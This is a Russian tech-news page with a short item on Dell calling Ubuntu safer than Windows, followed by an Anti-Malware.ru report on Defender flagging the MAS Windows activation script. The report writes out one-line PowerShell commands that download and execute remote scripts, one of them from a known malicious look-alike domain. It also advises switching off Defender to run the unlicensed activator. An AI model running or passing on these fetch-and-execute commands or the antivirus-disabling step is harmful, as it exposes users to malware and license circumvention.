Dell считает Ubuntu безопаснее Windows

Dell считает Ubuntu безопаснее Windows

...

Компания Dell считает, что Ubuntu лучше защищена и менее восприимчива к вредоносному ПО, нежели Windows. "Подавляющее большинство написанных хакерами вирусов и шпионских программ не предназначено для атаки на Linux", - говорится на страницах промо-сайта dell.com/ubuntu, рассказывающего о преимуществах свободной операционной системы и призванного увеличить продажи ПК с предустановленной Ubuntu.

В Dell отметили, что ОС Ubuntu базируется на Linux, которая существует на рынке около 20 лет и отличается стабильностью, надежностью, а также широкой распространенностью. Производитель ПК упоминает быструю загрузку Ubuntu, а также простой и удобный интерфейс системы.

В остальном, как подчеркнули в Dell, операционная система Ubuntu не отличается от Windows. Ее также можно использовать для мультимедийных развлечений, серфинга в интернете, общения с друзьями и знакомыми в социальных сетях.

Кроме того представители Dell сообщили, что в самое ближайшее время планируется наладить выпуск компьютеров Dell с Ubuntu 10.04.

 Источник

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru